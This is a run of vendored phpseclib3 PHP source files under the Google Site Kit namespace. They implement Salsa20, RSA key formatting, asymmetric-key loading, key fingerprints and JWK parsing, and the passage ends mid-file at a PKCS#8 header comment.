savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $d, array $primes, array $exponents, array $coefficients, $password = '', array $options = []) { $num_primes = \count($primes); $key = ['version' => $num_primes == 2 ? 'two-prime' : 'multi', 'modulus' => $n, 'publicExponent' => $e, 'privateExponent' => $d, 'prime1' => $primes[1], 'prime2' => $primes[2], 'exponent1' => $exponents[1], 'exponent2' => $exponents[2], 'coefficient' => $coefficients[2]]; for ($i = 3; $i <= $num_primes; $i++) { $key['otherPrimeInfos'][] = ['prime' => $primes[$i], 'exponent' => $exponents[$i], 'coefficient' => $coefficients[$i]]; } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RSAPrivateKey::MAP); return self::wrapPrivateKey($key, 'RSA', $password, $options); } /** * Convert a public key to the appropriate format * * @param BigInteger $n * @param BigInteger $e * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $n, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $e) { $key = ['modulus' => $n, 'publicExponent' => $e]; $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\RSAPublicKey::MAP); return self::wrapPublicKey($key, 'RSA'); } } <?php /** * Pure-PHP implementation of Salsa20. * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2019 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\StreamCipher; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadDecryptionException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException; /** * Pure-PHP implementation of Salsa20. * * @author Jim Wigginton <terrafrost@php.net> */ class Salsa20 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\StreamCipher { /** * Part 1 of the state * * @var string|false */ protected $p1 = \false; /** * Part 2 of the state * * @var string|false */ protected $p2 = \false; /** * Key Length (in bytes) * * @var int */ protected $key_length = 32; // = 256 bits /** * @see \phpseclib3\Crypt\Salsa20::crypt() */ const ENCRYPT = 0; /** * @see \phpseclib3\Crypt\Salsa20::crypt() */ const DECRYPT = 1; /** * Encryption buffer for continuous mode * * @var array */ protected $enbuffer; /** * Decryption buffer for continuous mode * * @var array */ protected $debuffer; /** * Counter * * @var int */ protected $counter = 0; /** * Using Generated Poly1305 Key * * @var boolean */ protected $usingGeneratedPoly1305Key = \false; /** * Salsa20 uses a nonce * * @return bool */ public function usesNonce() { return \true; } /** * Sets the key. * * @param string $key * @throws \LengthException if the key length isn't supported */ public function setKey($key) { switch (\strlen($key)) { case 16: case 32: break; default: throw new \LengthException('Key of size ' . \strlen($key) . ' not supported by this algorithm. Only keys of sizes 16 or 32 are supported'); } parent::setKey($key); } /** * Sets the nonce. * * @param string $nonce */ public function setNonce($nonce) { if (\strlen($nonce) != 8) { throw new \LengthException('Nonce of size ' . \strlen($key) . ' not supported by this algorithm. Only an 64-bit nonce is supported'); } $this->nonce = $nonce; $this->changed = \true; $this->setEngine(); } /** * Sets the counter. * * @param int $counter */ public function setCounter($counter) { $this->counter = $counter; $this->setEngine(); } /** * Creates a Poly1305 key using the method discussed in RFC8439 * * See https://tools.ietf.org/html/rfc8439#section-2.6.1 */ protected function createPoly1305Key() { if ($this->nonce === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('No nonce has been defined'); } if ($this->key === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('No key has been defined'); } $c = clone $this; $c->setCounter(0); $c->usePoly1305 = \false; $block = $c->encrypt(\str_repeat("\x00", 256)); $this->setPoly1305Key(\substr($block, 0, 32)); if ($this->counter == 0) { $this->counter++; } } /** * Setup the self::ENGINE_INTERNAL $engine * * (re)init, if necessary, the internal cipher $engine * * _setup() will be called each time if $changed === true * typically this happens when using one or more of following public methods: * * - setKey() * * - setNonce() * * - First run of encrypt() / decrypt() with no init-settings * * @see self::setKey() * @see self::setNonce() * @see self::disableContinuousBuffer() */ protected function setup() { if (!$this->changed) { return; } $this->enbuffer = $this->debuffer = ['ciphertext' => '', 'counter' => $this->counter]; $this->changed = $this->nonIVChanged = \false; if ($this->nonce === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('No nonce has been defined'); } if ($this->key === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('No key has been defined'); } if ($this->usePoly1305 && !isset($this->poly1305Key)) { $this->usingGeneratedPoly1305Key = \true; $this->createPoly1305Key(); } $key = $this->key; if (\strlen($key) == 16) { $constant = 'expand 16-byte k'; $key .= $key; } else { $constant = 'expand 32-byte k'; } $this->p1 = \substr($constant, 0, 4) . \substr($key, 0, 16) . \substr($constant, 4, 4) . $this->nonce . "\x00\x00\x00\x00"; $this->p2 = \substr($constant, 8, 4) . \substr($key, 16, 16) . \substr($constant, 12, 4); } /** * Setup the key (expansion) */ protected function setupKey() { // Salsa20 does not utilize this method } /** * Encrypts a message. * * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @see self::crypt() * @param string $plaintext * @return string $ciphertext */ public function encrypt($plaintext) { $ciphertext = $this->crypt($plaintext, self::ENCRYPT); if (isset($this->poly1305Key)) { $this->newtag = $this->poly1305($ciphertext); } return $ciphertext; } /** * Decrypts a message. * * $this->decrypt($this->encrypt($plaintext)) == $this->encrypt($this->encrypt($plaintext)). * At least if the continuous buffer is disabled. * * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see self::crypt() * @param string $ciphertext * @return string $plaintext */ public function decrypt($ciphertext) { if (isset($this->poly1305Key)) { if ($this->oldtag === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('Authentication Tag has not been set'); } $newtag = $this->poly1305($ciphertext); if ($this->oldtag != \substr($newtag, 0, \strlen($this->oldtag))) { $this->oldtag = \false; throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadDecryptionException('Derived authentication tag and supplied authentication tag do not match'); } $this->oldtag = \false; } return $this->crypt($ciphertext, self::DECRYPT); } /** * Encrypts a block * * @param string $in */ protected function encryptBlock($in) { // Salsa20 does not utilize this method } /** * Decrypts a block * * @param string $in */ protected function decryptBlock($in) { // Salsa20 does not utilize this method } /** * Encrypts or decrypts a message. * * @see self::encrypt() * @see self::decrypt() * @param string $text * @param int $mode * @return string $text */ private function crypt($text, $mode) { $this->setup(); if (!$this->continuousBuffer) { if ($this->engine == self::ENGINE_OPENSSL) { $iv = \pack('V', $this->counter) . $this->p2; return \openssl_encrypt($text, $this->cipher_name_openssl, $this->key, \OPENSSL_RAW_DATA, $iv); } $i = $this->counter; $blocks = \str_split($text, 64); foreach ($blocks as &$block) { $block ^= static::salsa20($this->p1 . \pack('V', $i++) . $this->p2); } unset($block); return \implode('', $blocks); } if ($mode == self::ENCRYPT) { $buffer =& $this->enbuffer; } else { $buffer =& $this->debuffer; } if (!\strlen($buffer['ciphertext'])) { $ciphertext = ''; } else { $ciphertext = $text ^ \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($buffer['ciphertext'], \strlen($text)); $text = \substr($text, \strlen($ciphertext)); if (!\strlen($text)) { return $ciphertext; } } $overflow = \strlen($text) % 64; // & 0x3F if ($overflow) { $text2 = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::pop($text, $overflow); if ($this->engine == self::ENGINE_OPENSSL) { $iv = \pack('V', $buffer['counter']) . $this->p2; // at this point $text should be a multiple of 64 $buffer['counter'] += (\strlen($text) >> 6) + 1; // ie. divide by 64 $encrypted = \openssl_encrypt($text . \str_repeat("\x00", 64), $this->cipher_name_openssl, $this->key, \OPENSSL_RAW_DATA, $iv); $temp = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::pop($encrypted, 64); } else { $blocks = \str_split($text, 64); if (\strlen($text)) { foreach ($blocks as &$block) { $block ^= static::salsa20($this->p1 . \pack('V', $buffer['counter']++) . $this->p2); } unset($block); } $encrypted = \implode('', $blocks); $temp = static::salsa20($this->p1 . \pack('V', $buffer['counter']++) . $this->p2); } $ciphertext .= $encrypted . ($text2 ^ $temp); $buffer['ciphertext'] = \substr($temp, $overflow); } elseif (!\strlen($buffer['ciphertext'])) { if ($this->engine == self::ENGINE_OPENSSL) { $iv = \pack('V', $buffer['counter']) . $this->p2; $buffer['counter'] += \strlen($text) >> 6; $ciphertext .= \openssl_encrypt($text, $this->cipher_name_openssl, $this->key, \OPENSSL_RAW_DATA, $iv); } else { $blocks = \str_split($text, 64); foreach ($blocks as &$block) { $block ^= static::salsa20($this->p1 . \pack('V', $buffer['counter']++) . $this->p2); } unset($block); $ciphertext .= \implode('', $blocks); } } return $ciphertext; } /** * Left Rotate * * @param int $x * @param int $n * @return int */ protected static function leftRotate($x, $n) { if (\PHP_INT_SIZE == 8) { $r1 = $x << $n; $r1 &= 0xffffffff; $r2 = ($x & 0xffffffff) >> 32 - $n; } else { $x = (int) $x; $r1 = $x << $n; $r2 = $x >> 32 - $n; $r2 &= (1 << $n) - 1; } return $r1 | $r2; } /** * The quarterround function * * @param int $a * @param int $b * @param int $c * @param int $d */ protected static function quarterRound(&$a, &$b, &$c, &$d) { $b ^= self::leftRotate($a + $d, 7); $c ^= self::leftRotate($b + $a, 9); $d ^= self::leftRotate($c + $b, 13); $a ^= self::leftRotate($d + $c, 18); } /** * The doubleround function * * @param int $x0 (by reference) * @param int $x1 (by reference) * @param int $x2 (by reference) * @param int $x3 (by reference) * @param int $x4 (by reference) * @param int $x5 (by reference) * @param int $x6 (by reference) * @param int $x7 (by reference) * @param int $x8 (by reference) * @param int $x9 (by reference) * @param int $x10 (by reference) * @param int $x11 (by reference) * @param int $x12 (by reference) * @param int $x13 (by reference) * @param int $x14 (by reference) * @param int $x15 (by reference) */ protected static function doubleRound(&$x0, &$x1, &$x2, &$x3, &$x4, &$x5, &$x6, &$x7, &$x8, &$x9, &$x10, &$x11, &$x12, &$x13, &$x14, &$x15) { // columnRound static::quarterRound($x0, $x4, $x8, $x12); static::quarterRound($x5, $x9, $x13, $x1); static::quarterRound($x10, $x14, $x2, $x6); static::quarterRound($x15, $x3, $x7, $x11); // rowRound static::quarterRound($x0, $x1, $x2, $x3); static::quarterRound($x5, $x6, $x7, $x4); static::quarterRound($x10, $x11, $x8, $x9); static::quarterRound($x15, $x12, $x13, $x14); } /** * The Salsa20 hash function function * * @param string $x */ protected static function salsa20($x) { $z = $x = \unpack('V*', $x); for ($i = 0; $i < 10; $i++) { static::doubleRound($z[1], $z[2], $z[3], $z[4], $z[5], $z[6], $z[7], $z[8], $z[9], $z[10], $z[11], $z[12], $z[13], $z[14], $z[15], $z[16]); } for ($i = 1; $i <= 16; $i++) { $x[$i] += $z[$i]; } return \pack('V*', ...$x); } /** * Calculates Poly1305 MAC * * @see self::decrypt() * @see self::encrypt() * @param string $ciphertext * @return string */ protected function poly1305($ciphertext) { if (!$this->usingGeneratedPoly1305Key) { return parent::poly1305($this->aad . $ciphertext); } else { /* sodium_crypto_aead_chacha20poly1305_encrypt does not calculate the poly1305 tag the same way sodium_crypto_aead_chacha20poly1305_ietf_encrypt does. you can see how the latter encrypts it in Salsa20::encrypt(). here's how the former encrypts it: $this->newtag = $this->poly1305( $this->aad . pack('V', strlen($this->aad)) . "\0\0\0\0" . $ciphertext . pack('V', strlen($ciphertext)) . "\0\0\0\0" ); phpseclib opts to use the IETF construction, even when the nonce is 64-bits instead of 96-bits */ return parent::poly1305(self::nullPad128($this->aad) . self::nullPad128($ciphertext) . \pack('V', \strlen($this->aad)) . "\x00\x00\x00\x00" . \pack('V', \strlen($ciphertext)) . "\x00\x00\x00\x00"); } } } <?php /** * PrivateKey interface * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; /** * PrivateKey interface * * @author Jim Wigginton <terrafrost@php.net> */ interface PrivateKey { public function sign($message); //public function decrypt($ciphertext); public function getPublicKey(); public function toString($type, array $options = []); /** * @param string|false $password * @return mixed */ public function withPassword($password = \false); } <?php /** * Base Class for all stream ciphers * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @author Hans-Juergen Petrich <petrich@tronic-media.com> * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; /** * Base Class for all stream cipher classes * * @author Jim Wigginton <terrafrost@php.net> */ abstract class StreamCipher extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\SymmetricKey { /** * Block Length of the cipher * * Stream ciphers do not have a block size * * @see \phpseclib3\Crypt\Common\SymmetricKey::block_size * @var int */ protected $block_size = 0; /** * Default Constructor. * * @see \phpseclib3\Crypt\Common\SymmetricKey::__construct() * @return StreamCipher */ public function __construct() { parent::__construct('stream'); } /** * Stream ciphers not use an IV * * @return bool */ public function usesIV() { return \false; } } <?php /** * Fingerprint Trait for Public Keys * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Traits; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash; /** * Fingerprint Trait for Private Keys * * @author Jim Wigginton <terrafrost@php.net> */ trait Fingerprint { /** * Returns the public key's fingerprint * * The public key's fingerprint is returned, which is equivalent to running `ssh-keygen -lf rsa.pub`. If there is * no public key currently loaded, false is returned. * Example output (md5): "c1:b1:30:29:d7:b8:de:6c:97:77:10:d7:46:41:63:87" (as specified by RFC 4716) * * @param string $algorithm The hashing algorithm to be used. Valid options are 'md5' and 'sha256'. False is returned * for invalid values. * @return mixed */ public function getFingerprint($algorithm = 'md5') { $type = self::validatePlugin('Keys', 'OpenSSH', 'savePublicKey'); if ($type === \false) { return \false; } $key = $this->toString('OpenSSH', ['binary' => \true]); if ($key === \false) { return \false; } switch ($algorithm) { case 'sha256': $hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha256'); $base = \base64_encode($hash->hash($key)); return \substr($base, 0, \strlen($base) - 1); case 'md5': return \substr(\chunk_split(\md5($key), 2, ':'), 0, -1); default: return \false; } } } <?php /** * Password Protected Trait for Private Keys * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Traits; /** * Password Protected Trait for Private Keys * * @author Jim Wigginton <terrafrost@php.net> */ trait PasswordProtected { /** * Password * * @var string|bool */ private $password = \false; /** * Sets the password * * Private keys can be encrypted with a password. To unset the password, pass in the empty string or false. * Or rather, pass in $password such that empty($password) && !is_string($password) is true. * * @see self::createKey() * @see self::load() * @param string|bool $password */ public function withPassword($password = \false) { $new = clone $this; $new->password = $password; return $new; } } <?php /** * Base Class for all asymmetric key ciphers * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA; use Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException; use Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Base Class for all asymmetric cipher classes * * @author Jim Wigginton <terrafrost@php.net> */ abstract class AsymmetricKey { /** * Precomputed Zero * * @var BigInteger */ protected static $zero; /** * Precomputed One * * @var BigInteger */ protected static $one; /** * Format of the loaded key * * @var string */ protected $format; /** * Hash function * * @var Hash */ protected $hash; /** * HMAC function * * @var Hash */ private $hmac; /** * Supported plugins (lower case) * * @see self::initialize_static_variables() * @var array */ private static $plugins = []; /** * Invisible plugins * * @see self::initialize_static_variables() * @var array */ private static $invisiblePlugins = []; /** * Available Engines * * @var boolean[] */ protected static $engines = []; /** * Key Comment * * @var null|string */ private $comment; /** * @param string $type * @return array|string */ public abstract function toString($type, array $options = []); /** * The constructor */ protected function __construct() { self::initialize_static_variables(); $this->hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha256'); $this->hmac = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash('sha256'); } /** * Initialize static variables */ protected static function initialize_static_variables() { if (!isset(self::$zero)) { self::$zero = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(0); self::$one = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(1); } self::loadPlugins('Keys'); if (static::ALGORITHM != 'RSA' && static::ALGORITHM != 'DH') { self::loadPlugins('Signature'); } } /** * Load the key * * @param string $key * @param string $password optional * @return PublicKey|PrivateKey */ public static function load($key, $password = \false) { self::initialize_static_variables(); $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('load() should not be called from final classes (' . static::class . ')'); } $components = \false; foreach (self::$plugins[static::ALGORITHM]['Keys'] as $format) { if (isset(self::$invisiblePlugins[static::ALGORITHM]) && \in_array($format, self::$invisiblePlugins[static::ALGORITHM])) { continue; } try { $components = $format::load($key, $password); } catch (\Exception $e) { $components = \false; } if ($components !== \false) { break; } } if ($components === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('Unable to read key'); } $components['format'] = $format; $components['secret'] = isset($components['secret']) ? $components['secret'] : ''; $comment = isset($components['comment']) ? $components['comment'] : null; $new = static::onLoad($components); $new->format = $format; $new->comment = $comment; return $new instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey ? $new->withPassword($password) : $new; } /** * Loads a private key * * @return PrivateKey * @param string|array $key * @param string $password optional */ public static function loadPrivateKey($key, $password = '') { $key = self::load($key, $password); if (!$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('The key that was loaded was not a private key'); } return $key; } /** * Loads a public key * * @return PublicKey * @param string|array $key */ public static function loadPublicKey($key) { $key = self::load($key); if (!$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('The key that was loaded was not a public key'); } return $key; } /** * Loads parameters * * @return AsymmetricKey * @param string|array $key */ public static function loadParameters($key) { $key = self::load($key); if (!$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey && !$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('The key that was loaded was not a parameter'); } return $key; } /** * Load the key, assuming a specific format * * @param string $type * @param string $key * @param string $password optional * @return static */ public static function loadFormat($type, $key, $password = \false) { self::initialize_static_variables(); $components = \false; $format = \strtolower($type); if (isset(self::$plugins[static::ALGORITHM]['Keys'][$format])) { $format = self::$plugins[static::ALGORITHM]['Keys'][$format]; $components = $format::load($key, $password); } if ($components === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('Unable to read key'); } $components['format'] = $format; $components['secret'] = isset($components['secret']) ? $components['secret'] : ''; $new = static::onLoad($components); $new->format = $format; return $new instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey ? $new->withPassword($password) : $new; } /** * Loads a private key * * @return PrivateKey * @param string $type * @param string $key * @param string $password optional */ public static function loadPrivateKeyFormat($type, $key, $password = \false) { $key = self::loadFormat($type, $key, $password); if (!$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('The key that was loaded was not a private key'); } return $key; } /** * Loads a public key * * @return PublicKey * @param string $type * @param string $key */ public static function loadPublicKeyFormat($type, $key) { $key = self::loadFormat($type, $key); if (!$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('The key that was loaded was not a public key'); } return $key; } /** * Loads parameters * * @return AsymmetricKey * @param string $type * @param string|array $key */ public static function loadParametersFormat($type, $key) { $key = self::loadFormat($type, $key); if (!$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PrivateKey && !$key instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\PublicKey) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('The key that was loaded was not a parameter'); } return $key; } /** * Validate Plugin * * @param string $format * @param string $type * @param string $method optional * @return mixed */ protected static function validatePlugin($format, $type, $method = null) { $type = \strtolower($type); if (!isset(self::$plugins[static::ALGORITHM][$format][$type])) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException("{$type} is not a supported format"); } $type = self::$plugins[static::ALGORITHM][$format][$type]; if (isset($method) && !\method_exists($type, $method)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\UnsupportedFormatException("{$type} does not implement {$method}"); } return $type; } /** * Load Plugins * * @param string $format */ private static function loadPlugins($format) { if (!isset(self::$plugins[static::ALGORITHM][$format])) { self::$plugins[static::ALGORITHM][$format] = []; foreach (new \DirectoryIterator(__DIR__ . '/../' . static::ALGORITHM . '/Formats/' . $format . '/') as $file) { if ($file->getExtension() != 'php') { continue; } $name = $file->getBasename('.php'); if ($name[0] == '.') { continue; } $type = '\\Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\' . static::ALGORITHM . '\\Formats\\' . $format . '\\' . $name; $reflect = new \ReflectionClass($type); if ($reflect->isTrait()) { continue; } self::$plugins[static::ALGORITHM][$format][\strtolower($name)] = $type; if ($reflect->hasConstant('IS_INVISIBLE')) { self::$invisiblePlugins[static::ALGORITHM][] = $type; } } } } /** * Returns a list of supported formats. * * @return array */ public static function getSupportedKeyFormats() { self::initialize_static_variables(); return self::$plugins[static::ALGORITHM]['Keys']; } /** * Add a fileformat plugin * * The plugin needs to either already be loaded or be auto-loadable. * Loading a plugin whose shortname overwrite an existing shortname will overwrite the old plugin. * * @see self::load() * @param string $fullname * @return bool */ public static function addFileFormat($fullname) { self::initialize_static_variables(); if (\class_exists($fullname)) { $meta = new \ReflectionClass($fullname); $shortname = $meta->getShortName(); self::$plugins[static::ALGORITHM]['Keys'][\strtolower($shortname)] = $fullname; if ($meta->hasConstant('IS_INVISIBLE')) { self::$invisiblePlugins[static::ALGORITHM][] = \strtolower($shortname); } } } /** * Returns the format of the loaded key. * * If the key that was loaded wasn't in a valid or if the key was auto-generated * with RSA::createKey() then this will throw an exception. * * @see self::load() * @return mixed */ public function getLoadedFormat() { if (empty($this->format)) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\NoKeyLoadedException('This key was created with createKey - it was not loaded with load. Therefore there is no "loaded format"'); } $meta = new \ReflectionClass($this->format); return $meta->getShortName(); } /** * Returns the key's comment * * Not all key formats support comments. If you want to set a comment use toString() * * @return null|string */ public function getComment() { return $this->comment; } /** * Tests engine validity * */ public static function useBestEngine() { static::$engines = [ 'PHP' => \true, 'OpenSSL' => \extension_loaded('openssl'), // this test can be satisfied by either of the following: // http://php.net/manual/en/book.sodium.php // https://github.com/paragonie/sodium_compat 'libsodium' => \function_exists('sodium_crypto_sign_keypair'), ]; return static::$engines; } /** * Flag to use internal engine only (useful for unit testing) * */ public static function useInternalEngine() { static::$engines = ['PHP' => \true, 'OpenSSL' => \false, 'libsodium' => \false]; } /** * __toString() magic method * * @return string */ public function __toString() { return $this->toString('PKCS8'); } /** * Determines which hashing function should be used * * @param string $hash */ public function withHash($hash) { $new = clone $this; $new->hash = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash($hash); $new->hmac = new \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash($hash); return $new; } /** * Returns the hash algorithm currently being used * */ public function getHash() { return clone $this->hash; } /** * Compute the pseudorandom k for signature generation, * using the process specified for deterministic DSA. * * @param string $h1 * @return string */ protected function computek($h1) { $v = \str_repeat("\x01", \strlen($h1)); $k = \str_repeat("\x00", \strlen($h1)); $x = $this->int2octets($this->x); $h1 = $this->bits2octets($h1); $this->hmac->setKey($k); $k = $this->hmac->hash($v . "\x00" . $x . $h1); $this->hmac->setKey($k); $v = $this->hmac->hash($v); $k = $this->hmac->hash($v . "\x01" . $x . $h1); $this->hmac->setKey($k); $v = $this->hmac->hash($v); $qlen = $this->q->getLengthInBytes(); while (\true) { $t = ''; while (\strlen($t) < $qlen) { $v = $this->hmac->hash($v); $t = $t . $v; } $k = $this->bits2int($t); if (!$k->equals(self::$zero) && $k->compare($this->q) < 0) { break; } $k = $this->hmac->hash($v . "\x00"); $this->hmac->setKey($k); $v = $this->hmac->hash($v); } return $k; } /** * Integer to Octet String * * @param BigInteger $v * @return string */ private function int2octets($v) { $out = $v->toBytes(); $rolen = $this->q->getLengthInBytes(); if (\strlen($out) < $rolen) { return \str_pad($out, $rolen, "\x00", \STR_PAD_LEFT); } elseif (\strlen($out) > $rolen) { return \substr($out, -$rolen); } else { return $out; } } /** * Bit String to Integer * * @param string $in * @return BigInteger */ protected function bits2int($in) { $v = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($in, 256); $vlen = \strlen($in) << 3; $qlen = $this->q->getLength(); if ($vlen > $qlen) { return $v->bitwise_rightShift($vlen - $qlen); } return $v; } /** * Bit String to Octet String * * @param string $in * @return string */ private function bits2octets($in) { $z1 = $this->bits2int($in); $z2 = $z1->subtract($this->q); return $z2->compare(self::$zero) < 0 ? $this->int2octets($z1) : $this->int2octets($z2); } } <?php /** * PublicKey interface * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2009 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; /** * PublicKey interface * * @author Jim Wigginton <terrafrost@php.net> */ interface PublicKey { public function verify($message, $signature); //public function encrypt($plaintext); public function toString($type, array $options = []); public function getFingerprint($algorithm); } <?php /** * Base Class for all block ciphers * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @author Hans-Juergen Petrich <petrich@tronic-media.com> * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common; /** * Base Class for all block cipher classes * * @author Jim Wigginton <terrafrost@php.net> */ abstract class BlockCipher extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\SymmetricKey { } <?php /** * JSON Web Key (RFC7517) Handler * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; /** * JSON Web Key Formatted Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class JWK { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password * @return array */ public static function load($key, $password = '') { if (!\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::is_stringable($key)) { throw new \UnexpectedValueException('Key should be a string - not a ' . \gettype($key)); } $key = \preg_replace('#\\s#', '', $key); // remove whitespace if (\PHP_VERSION_ID >= 73000) { $key = \json_decode($key, null, 512, \JSON_THROW_ON_ERROR); } else { $key = \json_decode($key); if (!$key) { throw new \RuntimeException('Unable to decode JSON'); } } if (isset($key->kty)) { return $key; } if (\count($key->keys) != 1) { throw new \RuntimeException('Although the JWK key format supports multiple keys phpseclib does not'); } return $key->keys[0]; } /** * Wrap a key appropriately * * @return string */ protected static function wrapKey(array $key, array $options) { return \json_encode(['keys' => [$key + $options]]); } } <?php /** * PKCS#8 Formatted Key Handler * * PHP version 5 * * Used by PHP's openssl_public_encrypt() and openssl's rsautl (when -pubin is set) * * Processes keys with the following headers: * * -----BEGIN ENCRYPTED PRIVATE KEY----- * -----BEGIN PRIVATE KEY----- * -----BEGIN PUBLIC KEY----- * * Analogous to ssh-keygen's pkcs8 format (as specified by -m). Although PKCS8 * is specific to private keys it's basically creating a DER-encoded wrapper * for keys. This just extends that same concept to public keys (much like ssh-keygen) * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ 